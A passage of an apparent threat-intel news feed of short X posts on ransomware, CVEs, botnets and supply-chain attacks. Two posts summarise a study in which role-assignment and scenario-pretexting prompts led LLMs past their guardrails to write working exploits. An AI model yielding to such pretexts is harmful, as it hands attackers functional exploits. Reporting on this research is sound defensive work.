preservation/medical services) Quasar Data Center (Houston colocation/cloud/BCP) and Z-Tronix (California manufacturing)signaling continued multi-sector extortion pressure and potential data-theft risk for healthcare and critical IT service providers. 🕷 Malware: Qilin Ransomware 🎯 Target: Israel/Healthcare + USA/Cloud & Manufacturing # Category: #Ransomware #Qilin #DataBreach #Israel #USA #Healthcare #DataCenter #Manufacturing" [X Link](https://x.com/ThreatSynop/status/2006349387304243240) 2025-12-31T12:59Z [--] followers, [--] engagements "🚨 Threat Actors Manipulate LLMs to Automate Exploit Creation Against Enterprise Apps A new study shows attackers can social-engineer mainstream LLMs (e.g. GPT-4o/Claude) using structured pretexting (Role-play Scenario Action) to bypass safety guardrails and reliably generate functional exploit scriptsreportedly achieving 100% success in weaponizing Odoo ERP CVEs. This collapses the traditional skill barrier for exploitation and forces defenders to assume faster time-to-exploit even from low-skill actors. 🕷 Malware: N/A 🎯 Target: Global/Enterprise Software (Odoo ERP & open-source stacks) #" [X Link](https://x.com/ThreatSynop/status/2006365095064989922) 2025-12-31T14:01Z [--] followers, [--] engagements "🚨 APT36 Abuses PDF.lnk Shortcuts to Drop In-Memory .NET RAT on Indian Government Targets APT36 (Transparent Tribe) is sending spear-phishing ZIP lures (Online JLPT Exam Dec containing a fake PDF that is actually a large .pdf.lnk; opening it launches mshta.exe to pull a remote HTA (innlive.in) that Base64+XOR decodes ReadOnly/WriteOnly blocks and loads an encrypted RAT DLL directly in memory while displaying a real PDF as a decoy. 🕷 Malware: APT36 in-memory .NET RAT (DLL) 🎯 Target: India/Government & Strategic Entities # Category: #APT36 #TransparentTribe #SpearPhishing #LNK #MSHTA #HTA" [X Link](https://x.com/ThreatSynop/status/2006365638663508064) 2025-12-31T14:03Z [--] followers, [--] engagements "🚨 AI Skepticism Surges as ROI Disappoints and Bubble Fears Grow As AI stock momentum cools and many enterprises report weak returns from GenAI pilots prominent critics argue vendors overpromised while real-world reliability and cost issues persist. In cybersecurity AI can accelerate vulnerability discovery/patching but measurable benefits remain uneven and AI-washing concerns are rising. 🕷 Malware: N/A 🎯 Target: Global/Enterprises & Cybersecurity Operations # Category: #AI #GenAI #Cybersecurity #AIROI #AIBubble #AIWashing #SecurityAutomation #RiskManagement 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006380883733799288) 2025-12-31T15:04Z [--] followers, [--] engagements "🚨 IBM API Connect Critical Auth Bypass (CVE-2025-13915) Puts Exposed API Gateways at Risk IBM disclosed a critical authentication bypass (CVSS 9.8) in API Connect that can let remote attackers gain unauthorized access on affected versions (10.0.8.010.0.8.5 10.0.11.0). Apply IBMs interim fix from Fix Central immediately; if you cant disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #APISecurity #CriticalVuln #PatchNow #DevSecOps 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006381973246193761) 2025-12-31T15:08Z [--] followers, [--] engagements "🚨 When the Cloud Goes Down Your Smart Devices Go Dumb Dark Reading highlights how mounting cloud outages (AWS Cloudflare Azure) are increasingly disrupting IoT-dependent daily lifesmart homes alarms thermostats and routinesbecause many devices cant function without constant cloud connectivity. A mid-October AWS outage that lasted nearly [--] hours underscored the risk of centralized dependencies making offline/fail-safe modes and resilience engineering a security and safety priority. 🕷 Malware: N/A 🎯 Target: Global/IoT & Smart Home Ecosystem # Category: #IoT #CloudOutage #Resilience" [X Link](https://x.com/ThreatSynop/status/2006383063366807954) 2025-12-31T15:12Z [--] followers, [--] engagements "🚨 IBM API Connect Critical Auth Bypass (CVE-2025-13915 CVSS 9.8) A critical authentication-bypass flaw in IBM API Connect lets unauthenticated attackers gain unauthorized access on affected versions (10.0.8.010.0.8.5 and 10.0.11.0) risking API gateway takeover and downstream compromise of managed APIs. Patch immediately using IBMs interim fixes; if patching is delayed disable Developer Portal self-service sign-up to reduce exposure. 🕷 Malware: N/A 🎯 Target: Global/Enterprises (API Management IBM API Connect) # Category: #CVE202513915 #IBM #APIConnect #AuthBypass #CriticalVuln #APISecurity" [X Link](https://x.com/ThreatSynop/status/2006383608131432932) 2025-12-31T15:15Z [--] followers, [--] engagements "🚨 RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Breach Next.js Servers CloudSEK reports RondoDox began scanning for vulnerable Next.js hosts on Dec [--] and started deploying payloads days later chaining single-request unauthenticated RCE into a botnet loader/health-checker a cryptominer and a Mirai variant while also removing competing malware and enforcing persistence via cron. 🕷 Malware: RondoDox (botnet) + Mirai variant + Coinminer 🎯 Target: Global/Next.js Web Servers + IoT (routers and connected devices) # Category: #RondoDox #React2Shell #CVE202555182 #Nextjs #RCE #Botnet" [X Link](https://x.com/ThreatSynop/status/2006390266542878835) 2025-12-31T15:41Z [--] followers, [---] engagements "🚨 Singapore CSA Warns of Maximum-Severity SmarterMail RCE Flaw (CVE-2025-52691) CSA issued an alert for CVE-2025-52691 (CVSS 10.0) where an unauthenticated attacker can upload arbitrary files to the mail server and potentially achieve remote code execution; affected SmarterMail Build [----] and earlier should be upgraded to Build [----] immediately. 🕷 Malware: N/A 🎯 Target: Singapore/Email Infrastructure (SmarterMail deployments) # Category: #CVE202552691 #SmarterMail #RCE #FileUpload #EmailSecurity #Vulnerability #PatchNow #CSA 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006394451615236463) 2025-12-31T15:58Z [--] followers, [---] engagements "🚨 Hackers Drain $3.9M From Unleash Protocol After Multisig Governance Hijack Attackers gained enough signing power to act as an admin in Unleashs multisig governance pushed an unauthorized contract upgrade and enabled illicit withdrawals of WIP/USDC/WETH and related assets; stolen funds were then bridged out and routed into Tornado Cash to reduce traceability. 🕷 Malware: N/A 🎯 Target: Global/DeFi (Unleash Protocol users and on-chain assets) # Category: #CryptoHack #DeFi #Multisig #SmartContracts #GovernanceAttack #ContractUpgrade #TornadoCash #IncidentResponse 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006411249018433752) 2025-12-31T17:04Z [--] followers, [--] engagements "🚨 Trust Wallet Chrome Extension Hack Drains $8.5M After Shai-Hulud Supply-Chain Breach Trust Wallet says attacker-exposed GitHub secrets enabled theft of its Chrome Web Store API key letting the actor publish a trojanized extension update (v2.68) that beaconed to attacker-controlled infrastructure and harvested wallet mnemonic phrases. About $8.5M was drained from [----] wallets highlighting how developer-secret leakage can directly translate into consumer fund theft via compromised release pipelines. 🕷 Malware: Shai-Hulud (supply-chain worm) + trojanized Trust Wallet browser extension 🎯" [X Link](https://x.com/ThreatSynop/status/2006426492180349220) 2025-12-31T18:05Z [--] followers, [--] engagements "🚨 GlassWorm Pivots to macOS: Malicious VS Code Extensions Use Encrypted JS + Solana C2 GlassWorms latest wave targets macOS developers via three Open VSX extensions using AES-256-CBCencrypted payloads embedded in compiled JavaScript plus a 15-minute execution delay to evade sandboxes then stealing Keychain data and persisting via LaunchAgents. The campaign also uses Solana transaction memos (base64 URLs) as decentralized C2 and is preparing wallet-focused trojanization against Ledger Live and Trezor Suite. 🕷 Malware: GlassWorm 🎯 Target: Global/Developers (macOS Web3/Crypto ecosystems) #" [X Link](https://x.com/ThreatSynop/status/2006427592035869015) 2025-12-31T18:09Z [--] followers, [--] engagements "🚨 Researchers Show RSA Prompt Manipulation Can Turn Mainstream LLMs Into Exploit Generators A University of Luxembourg study shows attackers can use RSA (Role-assignment Scenario-pretexting Action-solicitation) to bypass LLM guardrails and generate working exploits from public CVE disclosures achieving a reported 100% success rate against multiple Odoo ERP CVEs within [--] prompt rounds. This collapses the skill barrier for real compromise (DB exfiltration backdoor creation privilege escalation) and shortens defenders effective patch window. 🕷 Malware: N/A (LLM manipulation technique: RSA) 🎯" [X Link](https://x.com/ThreatSynop/status/2006429243186507876) 2025-12-31T18:16Z [--] followers, [--] engagements "🚨 Two U.S. Cybersecurity Pros Plead Guilty as ALPHV/BlackCat Affiliates Ryan Goldberg (GA) and Kevin Martin (TX) admitted they used ALPHV/BlackCats RaaS to extort U.S. victims in [----] including $1.2M in Bitcoin from one organization then laundered proceeds while paying the gang a 20% cut. The case underscores the insider-risk reality that defender-grade skills can dramatically accelerate ransomware intrusion and extortion operations. 🕷 Malware: ALPHV/BlackCat ransomware 🎯 Target: USA/Multiple Sectors # Category: #Ransomware #ALPHV #BlackCat #CyberCrime #Extortion #InsiderThreat #DOJ" [X Link](https://x.com/ThreatSynop/status/2006429792996933662) 2025-12-31T18:18Z [--] followers, [--] engagements "🚨 Critical Apache StreamPipes Flaw Lets Low-Privilege Users Hijack Admin Accounts (CVE-2025-47411) Apache warns that StreamPipes 0.69.00.97.0 lets any authenticated non-admin abuse user-ID/JWT handling to impersonate an administrator and gain full platform controlenabling backdoor account creation configuration tampering and streaming pipeline compromise. Patch by upgrading to 0.98.0 immediately. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability #PatchNow" [X Link](https://x.com/ThreatSynop/status/2006430342736130133) 2025-12-31T18:20Z [--] followers, [--] engagements "🚨 GlassWorm Worm Spreads via Malicious VS Code Extensions to Hit macOS Developers GlassWorm is propagating through Open VSX extensions using AES-encrypted JavaScript that sleeps [--] minutes to evade sandboxes then pulls Solana blockchainbased C2 to run commands and steal macOS Keychain data. The campaign also contains code to trojanize Ledger Live/Trezor Suite making developer machines a high-value pivot into both enterprise credentials and crypto assets. 🕷 Malware: GlassWorm 🎯 Target: Global/macOS Developers (VS Code + Open VSX; Web3 users at higher risk) # Category: #GlassWorm" [X Link](https://x.com/ThreatSynop/status/2006430409572122907) 2025-12-31T18:21Z [--] followers, [--] engagements "🚨 Ivanti EPMM Zero-Days Turn Mobile MDM Into an Enterprise-Wide C2 Ivanti EPMMs spring [----] zero-day chain (CVE-2025-4427 + CVE-2025-4428) was weaponized against thousands of orgsespecially in Europeletting attackers pivot from an internet-facing MDM server into enrolled phones directory data and even cloud tokens (M365/Google Workspace/Salesforce). The case shows how legitimate admin features in endpoint management platforms can become stealth intrusion tooling without deploying custom malware. 🕷 Malware: N/A (tooling observed: FRP reverse-proxy) 🎯 Target: Global (notably" [X Link](https://x.com/ThreatSynop/status/2006438027741270220) 2025-12-31T18:51Z [--] followers, [--] engagements "🚨 Apache StreamPipes Flaw Lets Any User Become Admin (CVE-2025-47411) A critical auth design failure in StreamPipes lets any authenticated low-privilege user tamper with JWT identity (e.g. swap their username to an existing admin) and instantly gain full administrative control across versions 0.69.00.97.0; attackers can then alter pipelines access sensitive operational/business data and establish persistence. Upgrade to 0.98.0 immediately and audit admin accounts and recent auth logs for suspicious token activity. 🕷 Malware: N/A 🎯 Target: Global/Enterprises Using Apache StreamPipes (Data" [X Link](https://x.com/ThreatSynop/status/2006453196173308064) 2025-12-31T19:51Z [--] followers, [--] engagements "🚨 Microsoft Teams Goes Secure by Default on Jan [--] [----] (Risky Files + Malicious Links Blocked) Microsoft will automatically enable three messaging protections for tenants on standard configurations: blocking weaponizable file types real-time malicious URL detection with user warnings and a false-positive reporting loopraising baseline defenses against phishing and malware delivered through collaboration chats. 🕷 Malware: N/A 🎯 Target: Global/Enterprises Using Microsoft Teams # Category: #Microsoft #Teams #SecureByDefault #Phishing #Malware #URLFiltering #CollaborationSecurity #M365" [X Link](https://x.com/ThreatSynop/status/2006468365695815933) 2025-12-31T20:51Z [--] followers, [--] engagements "🚨 NYC Mayoral Inauguration Bans Flipper Zero and Raspberry Pi Devices New York Citys [----] mayoral inauguration FAQ explicitly bans Flipper Zero and Raspberry Pi devices singling them out alongside traditional prohibited items despite laptops and phones not being listed. The move reflects growing public-event concern over wireless/hacking-capable gear but also highlights misunderstanding of real capability and risk since more powerful devices remain allowed. 🕷 Malware: N/A 🎯 Target: USA/Public Events & Physical Security # Category: #FlipperZero #RaspberryPi #PhysicalSecurity #EventSecurity" [X Link](https://x.com/ThreatSynop/status/2006513727684653526) 2025-12-31T23:52Z [--] followers, [--] engagements "🚨 RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Hijack Next.js Servers and IoT Devices A nine-month RondoDox campaign is now exploiting the critical React2Shell RCE in Next.js/React Server Components to mass-compromise exposed systems (90K still vulnerable) dropping crypto-miners a botnet loader/health-checker and a Mirai variant while killing competing malware and persisting via cron. 🕷 Malware: RondoDox + Mirai variant + Coinminer 🎯 Target: Global/Web Servers (Next.js) + IoT (heaviest exposure in USA) # Category: #RondoDox #Botnet #React2Shell #CVE202555182 #Nextjs #RCE #Mirai" [X Link](https://x.com/ThreatSynop/status/2006680561029468580) 2026-01-01T10:55Z [--] followers, [--] engagements "🚨 WhatsApp Backup Decryption Made Simple: wa-crypt-tools Supports .crypt12/.crypt14/.crypt15 Open-source wa-crypt-tools decrypts and (beta) re-encrypts WhatsApp/WhatsApp Business backup files when you provide the key converting encrypted backups into readable SQLite/ZIP artifacts for DFIR and recovery workflows. 🕷 Malware: N/A 🎯 Target: Global/Mobile Forensics & WhatsApp Backups # Category: #WhatsApp #MobileForensics #DFIR #Encryption #E2EE #IncidentResponse #DigitalForensics #Tooling 🔗 URL: https://cybersecuritynews.com/whatsapp-crypt-tool/" [X Link](https://x.com/ThreatSynop/status/2006681108851618218) 2026-01-01T10:57Z [--] followers, [--] engagements "🚨 87000+ internet-exposed MongoDB servers still at risk from MongoBleed (CVE-2025-14847) Shadowserver telemetry shows tens of thousands of publicly reachable MongoDB instances remain unpatched leaving them susceptible to unauthenticated memory-leak extraction that can expose credentials API keys and other sensitive in-memory data. With active exploitation and CISA KEV listing this is a high-urgency patch-and-exposure-reduction issue for any self-managed MongoDB deployment. 🕷 Malware: N/A 🎯 Target: Global / Databases (MongoDB) # Category: #MongoDB #MongoBleed #CVE202514847 #Vulnerability" [X Link](https://x.com/ThreatSynop/status/2006689880538055015) 2026-01-01T11:32Z [--] followers, [--] engagements "🚨 Malicious Featured Chrome extensions with 900K installs siphon ChatGPT/DeepSeek chats Researchers found two AITOPIA lookalike Chrome extensions (one even Google Featured) that scrape ChatGPT/DeepSeek conversations from the page DOM harvest active-tab URLs and session tokens then exfiltrate data every [--] minutes (Base64) to attacker-controlled infrastructure (e.g. deepaichats.com chatsaigpt.com). The campaign shows how trusted extension permissions can quietly turn AI prompts/responsesoften containing sensitive corporate datainto a high-value leakage channel. 🕷 Malware: N/A (Malicious" [X Link](https://x.com/ThreatSynop/status/2006690426250465682) 2026-01-01T11:34Z [--] followers, [--] engagements "🚨 DarkSpectre Zoom Stealer browser extensions exposed 2.2M users meeting intelligence A cluster of malicious Chrome/Edge/Firefox extensions (often disguised as legitimate productivity tools) silently scraped conferencing data across Zoom Microsoft Teams Google Meet Webex and others then exfiltrated meeting URLs attendee/speaker details registration info and related assets via persistent WebSocket streams to attacker infrastructureturning browser add-ons into a scalable corporate surveillance channel. 🕷 Malware: Zoom Stealer (DarkSpectre extension ecosystem) 🎯 Target: Global / Enterprise" [X Link](https://x.com/ThreatSynop/status/2006690973410038139) 2026-01-01T11:36Z [--] followers, [--] engagements "🚨 Bluetooth exploit toolkit released for Airoha headphone flaws impacting major brands Researchers published full technical details and a testing toolkit for three Airoha-based Bluetooth vulnerabilities (CVE-2025-20700/20701/20702) that can be abused by an attacker within Bluetooth range to eavesdrop tamper with firmware and impersonate headphones to hijack smartphone connections. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Bluetooth Headphones) # Category: #Bluetooth #Airoha #CVE202520700 #CVE202520701 #CVE202520702 #FirmwareSecurity #WirelessSecurity #IoT 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2006691520645112005) 2026-01-01T11:38Z [--] followers, [--] engagements "🚨 MongoBleed (CVE-2025-14847) exploited in the wild: unauthenticated MongoDB memory-leak now weaponized Attackers can send crafted compressed messages that make MongoDB return uninitialized heap memory pre-auth leaking secrets like passwords/API keys at scale; public exploit code is already circulating and real-world incidents have been reported. Patch immediately (8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30) or temporarily disable zlib compression and remove MongoDB from direct internet exposure. 🕷 Malware: MongoBleed exploit (CVE-2025-14847) 🎯 Target: Global / Databases (MongoDB) #" [X Link](https://x.com/ThreatSynop/status/2006692615081673069) 2026-01-01T11:42Z [--] followers, [--] engagements "🚨 Ubisoft shuts down Rainbow Six Siege & marketplace after apparent backend compromise Ubisoft took Rainbow Six Siege offline and halted its marketplace after reports of unauthorized bans inventory manipulation and massive in-game currency anomalies while rolling back transactions since 11:00 UTC as a containment step. Unverified claims suggest attackers may have pivoted from an exposed/misconfigured MongoDB (possibly via MongoBleed) into internal repos and backend toolingraising concerns about broader code/asset exposure and follow-on account phishing. 🕷 Malware: N/A 🎯 Target: Global /" [X Link](https://x.com/ThreatSynop/status/2006693160622104645) 2026-01-01T11:45Z [--] followers, [---] engagements "🚨 RondoDox botnet weaponizes React2Shell (CVE-2025-55182) to compromise Next.js servers CloudSEK reports active exploitation of the critical pre-auth RCE in React Server Components/Next.js with RondoDox scanning for vulnerable servers and dropping botnet clients plus cryptominers a loader/health-checker and a Mirai variant. The campaign blends rapid exploit-shotgun automation across web apps and IoT routers making patching/mitigation urgent to prevent persistent footholds and resource hijacking. 🕷 Malware: RondoDox (Mirai variant + cryptominer payloads) 🎯 Target: Global / Next.js Web Apps" [X Link](https://x.com/ThreatSynop/status/2006758357911126100) 2026-01-01T16:04Z [--] followers, [--] engagements "🚨 Trust Wallet confirms second Shai-Hulud supply-chain hit after $8.5M crypto theft Attackers used leaked developer GitHub secrets and a stolen Chrome Web Store API key to publish a tampered Trust Wallet Chrome extension (v2.68) that exfiltrated sensitive wallet data on every unlock and routed it to attacker infrastructure (metrics-trustwallet.com) enabling wallet draining. Trust Wallet rolled back to a clean build restricted publishing credentials began fund-tracking with partners and committed to reimbursing affected users. 🕷 Malware: Shai-Hulud (supply-chain wallet drainer) 🎯 Target:" [X Link](https://x.com/ThreatSynop/status/2006774579277214127) 2026-01-01T17:08Z [--] followers, [--] engagements "🚨 MongoBleed lessons: Pre-auth MongoDB memory-leak (CVE-2025-14847) is being exploited in the wild MongoBleed abuses zlib message decompression before authentication to leak uninitialized heap memory (credentials API keys tokens PII) from internet-exposed MongoDB servers with public PoC and confirmed active exploitation. Key actions: patch/upgrade remove direct internet exposure disable zlib compression as a temporary mitigation and rotate secrets post-fix. 🕷 Malware: MongoBleed (CVE-2025-14847) exploit 🎯 Target: Global / MongoDB Databases (Internet-exposed) # Category: #MongoDB" [X Link](https://x.com/ThreatSynop/status/2007017571749368023) 2026-01-02T09:14Z [--] followers, [--] engagements "🚨 Modified Shai-Hulud worm spotted on npm with heavier obfuscation and new exfil targets A newly observed Shai-Hulud variant was found embedded in the npm package @vietmoney/react-big-calendar renaming core components (bun_installer.js / environment_source.js) and adding new secret-harvest artifacts (e.g. 3nvir0nm3nt.json cl0vd.json actionsSecrets.json) while changing its GitHub exfil tagging to Goldox-T3chs: Only Happy Girl. Analysts believe this is live operator iteration (improved TruffleHog handling Windows bun.exe support dead-man switch removed) but a coding mismatch (c0nt3nts.json vs" [X Link](https://x.com/ThreatSynop/status/2007033791001272507) 2026-01-02T10:18Z [--] followers, [--] engagements "🚨 Covenant Health breach impacts [------] after Qilin ransomware data theft Covenant Health updated regulators that a May [----] intrusion attributed to the Qilin ransomware group exposed data for [------] individuals including SSNs insurance details and treatment information after its investigation concluded months later. Qilin claims it stole 850GB and has reportedly published the data indicating extortion pressure and elevated identity-theft risk. 🕷 Malware: Qilin (ransomware) 🎯 Target: USA / Healthcare # Category: #DataBreach #Ransomware #Qilin #Healthcare #PHI #PII #Extortion" [X Link](https://x.com/ThreatSynop/status/2007049460807836068) 2026-01-02T11:20Z [--] followers, [--] engagements "🚨 AI supercharged scams in 2025: voice clones deepfakes and hyper-personalized social engineering Malwarebytes reports scammers are using AI to scale and personalize fraud with realistic text cloned voices and synthetic videomaking impersonation (from family to senior officials) far harder to spot and accelerating trust erosion in digital communications. The takeaway: verification-by-second-channel and tighter identity controls are now baseline defenses not nice to have. 🎯 Target: Global / Consumers & Organizations (Social Engineering) # Category: #AIScams #SocialEngineering #Deepfakes" [X Link](https://x.com/ThreatSynop/status/2007050009804513342) 2026-01-02T11:23Z [--] followers, [--] engagements "🚨 RondoDox botnet weaponizes React2Shell (CVE-2025-55182) to compromise Next.js servers SecurityWeek reports RondoDox operators actively exploit the pre-auth RCE flaw in React Server Components to enroll vulnerable Next.js servers dropping a botnet framework that kills rival botnets/miners establishes persistence and installs both a cryptominer and a Mirai variant. 🕷 Malware: RondoDox (drops cryptominer + Mirai variant) 🎯 Target: Global / Next.js Web Servers (AppSec) # Category: #React2Shell #CVE202555182 #Nextjs #React #Botnet #Mirai #Cryptomining #RCE #WebSecurity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2007065862126047265) 2026-01-02T12:26Z [--] followers, [--] engagements "🚨 Fake Eternl Desktop wallet email targets Cardano users with stealthy remote-access installer A phishing campaign lures Cardano users to download a malicious Eternl.msi from a newly registered domain that drops GoTo/LogMeIn Resolve Unattended components (unattended-updater.exe) and writes unattended.json to enable persistent remote control. The installer then beacons to legitimate GoTo Resolve endpoints to exfil system telemetry and maintain accesssetting victims up for follow-on credential theft and wallet draining. 🕷 Malware: GoTo/LogMeIn Resolve Unattended (abused RMM) 🎯 Target: Global" [X Link](https://x.com/ThreatSynop/status/2007082697953304976) 2026-01-02T13:32Z [--] followers, [--] engagements "🚨 Fintech Security 101: How to Protect Your Digital Wallet from Modern Fraud HackRead outlines core controls for wallet safetystrong authentication (MFA/biometrics) end-to-end encryption and continuous monitoringwhile warning that phishing device malware and public Wi-Fi remain the most common paths to account takeover and financial loss. 🎯 Target: Global / Fintech & Digital Wallet Users # Category: #Fintech #DigitalWallet #CyberSecurity #MFA #Encryption #Phishing #FraudPrevention #DataProtection 🔗 URL: https://hackread.com/protecting-digital-wallet-fintech-security/" [X Link](https://x.com/ThreatSynop/status/2007244716237058057) 2026-01-03T00:16Z [--] followers, [--] engagements "🚨 VVS Stealer hides behind PyArmor to dodge signatures and steal Discord + browser secrets VVS Stealer (a PyInstaller-packed Python infostealer) uses PyArmor (AES-CTR string/bytecode encryption + BCC/C-compiled functions) to frustrate static analysis while harvesting Discord tokens (DPAPI decryption + session injection) browser credentials/cookies and persisting via the Windows Startup folder. 🕷 Malware: VVS Stealer (VVS $tealer) 🎯 Target: Global / Windows (Discord users + browser data) # Category: #Infostealer #VVSstealer #Discord #PyArmor #PyInstaller #CredentialTheft #TokenTheft" [X Link](https://x.com/ThreatSynop/status/2007388230316871912) 2026-01-03T09:47Z [--] followers, [--] engagements "🚨 RondoDox Botnet Exploits React2Shell to Hijack 90K+ Exposed Next.js & IoT Devices RondoDox is actively exploiting the React2Shell flaw in Next.js (CVE-2025-55182) to mass-compromise routers smart cameras and small business websites with scans showing 90300+ exposed systems. Post-compromise it drops a cryptominer (/nuts/poop) a Mirai variant (/nuts/x86) and a watchdog (/nuts/bolts) that kills competing malware every [--] seconds to keep exclusive control. 🕷 Malware: RondoDox (drops cryptominer + Mirai variant) 🎯 Target: Global / Next.js Websites + Routers & Smart Cameras # Category:" [X Link](https://x.com/ThreatSynop/status/2007494721875083274) 2026-01-03T16:50Z [--] followers, [---] engagements "🚨 Finland arrests Fitburg crew over suspected undersea cable sabotage Finnish police arrested two crew members and detained the full 14-person crew of the Fitburg after investigators found signs the ship dragged its anchor and damaged an undersea telecom cable linking Helsinki and Estonia. The case matters because Baltic subsea cables are treated as critical infrastructure and repeated hybrid disruption incidents can escalate regional security risk and telecom resilience costs. 🎯 Target: Finland/Telecom (Undersea Cable Infrastructure) # Category: #UnderseaCables #CriticalInfrastructure" [X Link](https://x.com/ThreatSynop/status/2007574192066347422) 2026-01-03T22:06Z [--] followers, [--] engagements "🚨 ShinyHunters claims Resecurity breach firm says attackers only hit a monitored honeypot ShinyHunters posted Telegram screenshots alleging stolen internal chats employee data threat intel and client info but Resecurity says the accessed environment was an isolated honeypot seeded with synthetic datasets to observe the actors TTPs and infrastructure. Resecurity claims it logged extensive exfil automation via residential proxies and shared related telemetry with law enforcement. 🎯 Target: Global / Cybersecurity (Resecurity) # Category: #ShinyHunters #Resecurity #DataBreach #Honeypot" [X Link](https://x.com/ThreatSynop/status/2007574741662478733) 2026-01-03T22:08Z [--] followers, [--] engagements "🚨 Holiday-timed ColdFusion exploitation surge: GreyNoise spots coordinated scans hitting 10+ CVEs GreyNoise observed [----] malicious requests targeting 10+ Adobe ColdFusion flaws (20232024) peaking on Dec [--] with 98% of traffic coming from two Japan-hosted IPs and using Interactsh + JNDI/LDAP-style OAST verificationsuggesting automated exploitation during reduced holiday monitoring. 🎯 Target: Global / Adobe ColdFusion Servers (Web & Enterprise Apps) # Category: #Adobe #ColdFusion #ExploitAttempts #Vulnerability #ThreatIntel #GreyNoise #RCE #LFI #AttackSurface 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2007577491116900596) 2026-01-03T22:19Z [--] followers, [--] engagements "🚨 Trump orders divestment of $2.9M Emcore chip assets from HieFo over China-linked control President Donald Trump issued an executive order forcing HieFo Corp. to divest Emcores chip and indium-phosphide wafer-fab assets within [---] days citing national security concerns and credible evidence the buyer is controlled by a Chinese citizen. The move follows a CFIUS review and highlights tighter U.S. scrutiny of even small semiconductor transactions tied to China. 🎯 Target: USA / Semiconductors & National Security # Category: #CFIUS #Semiconductors #NationalSecurity #ForeignInvestment" [X Link](https://x.com/ThreatSynop/status/2007578041199837589) 2026-01-03T22:21Z [--] followers, [--] engagements "🚨 Finland Seizes Fitburg as Undersea Cable Cut Triggers Sabotage Probe Finnish authorities detained the cargo ship Fitburg after a major fault severed an undersea data cable linking Helsinki and Estonia with investigators saying the vessel appeared to drag its anchor across the break site. Two crew members were arrested (two more travel-banned) and customs found sanctioned Russian steel on board escalating concerns the incident could be deliberate hybrid disruption of critical infrastructure. 🎯 Target: Finland & Estonia/Telecom # Category: #UnderseaCables #CriticalInfrastructure" [X Link](https://x.com/ThreatSynop/status/2007600759278338392) 2026-01-03T23:51Z [--] followers, [--] engagements "🚨 CES [----] Live Updates: Early TV Smart-Glasses and Phone Announcements Start Rolling In ZDNets live updates page previews CES [----] ahead of the January [--] show opening in Las Vegas noting the weeks pre-CES announcement surge and positioning TVs smart glasses and phones as key battleground categories. Its a signal that major vendors (e.g. Samsung and LG) are front-loading launches and narrative-setting before the show floor opens. 🎯 Target: Global/Consumer Tech # Category: #CES2026 #TechNews #ConsumerElectronics #SmartGlasses #TVTech #MobileTech #AI 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2007760021942075616) 2026-01-04T10:24Z [--] followers, [--] engagements "🚨 GreyNoise Flags Holiday Surge: One Actor Drives Thousands of Adobe ColdFusion Exploit Attempts GreyNoise logged [----] malicious requests over Christmas [----] targeting 10+ Adobe ColdFusion CVEs (20232024) with 98% of traffic traced to two CTG Server Limited-hosted IPs using automated JNDI/LDAP-style probes plus Interactsh (OAST) callbacks. Activity peaked on Dec [--] and disproportionately hit servers in the US Spain and Indiamaking patch hygiene and holiday-period monitoring critical. 🎯 Target: Global/Web Apps (Adobe ColdFusion) US Spain India # Category: #AdobeColdFusion" [X Link](https://x.com/ThreatSynop/status/2007812470719545594) 2026-01-04T13:52Z [--] followers, [--] engagements "🚨 Venezuela Internet Disruptions Spike as NetBlocks Flags Caracas Outages and Tor Usage Surges NetBlocks reported connectivity losses in parts of Caracas tied to power cuts during a U.S. military operation while public remarks suggested possible cyber/technical effects were used alongside kinetic action. Tor metrics reviewed in the report show a sharp spike in Venezuelan usersconsistent with heightened surveillance fears censorship risk and attempts to reach external information sources. 🎯 Target: Venezuela/Internet & Civil Society (Caracas) # Category: #Venezuela #InternetOutage #NetBlocks" [X Link](https://x.com/ThreatSynop/status/2007858993440362541) 2026-01-04T16:57Z [--] followers, [--] engagements "🚨 Resecurity Baits ShinyHunters/SLH With Decoy Accounts Exposes OPSEC Mistakes Resecurity says actors linked to ShinyHunters / Scattered Lapsus$ Hunters attempted to target an employee but were funneled into a controlled honeypot account packed with realistic-looking yet inactionable data built from breached datasets and generated content. The firm claims the trap captured indicators like IPs/residential proxies and operational mistakes underscoring how deception can turn breach-claims into actionable attribution and detection intel. 🎯 Target: Global/Cybersecurity & Threat Intel # Category:" [X Link](https://x.com/ThreatSynop/status/2007889876457312561) 2026-01-04T19:00Z [--] followers, [--] engagements "🚨 Belkin ConnectAir Turns Any USB-C Device Into a Wireless HDMI Sender (No Wi-Fi Needed) Belkins ConnectAir kit uses a USB-C transmitter and HDMI receiver to push 1080p/60 video over a direct 5GHz link up to [---] feet with plug-and-play setup and support for quickly switching among multiple transmitters. Its positioned for conference rooms classrooms and travel setups where casting protocols or managed Wi-Fi arent reliable. 🎯 Target: Global/Enterprise AV & Consumers # Category: #CES2026 #Belkin #WirelessHDMI #DisplayTech #EnterpriseIT #AV #Productivity 🔗 URL:" [X Link](https://x.com/ThreatSynop/status/2007935861732561155) 2026-01-04T22:03Z [--] followers, [--] engagements "🚨 Xreal 1S Review: Real 3D Pushes Sub-$500 XR Glasses Into Serious Big-Screen Territory ZDNets hands-on says the Xreal 1S delivers a notably more immersive portable display1200p optics [---] nits wider FoV and on-device Real 3D (2D3D conversion) via the X1 chipat around $449. This matters for hybrid work and travel: its a personal private screen for productivity/gaming but it also expands the attack surface (USB-C video accessories companion apps and device trust) if used on unmanaged endpoints. 🎯 Target: Global/Consumers & Mobile Professionals # Category: #Xreal #Xreal1S #XR #ARGlasses" [X Link](https://x.com/ThreatSynop/status/2007951029610877374) 2026-01-04T23:03Z [--] followers, [--] engagements "🚨 DuRoBo Krono Brings Phone-Sized E-Ink + Open Android to CES [----] (A Focus Hub Not 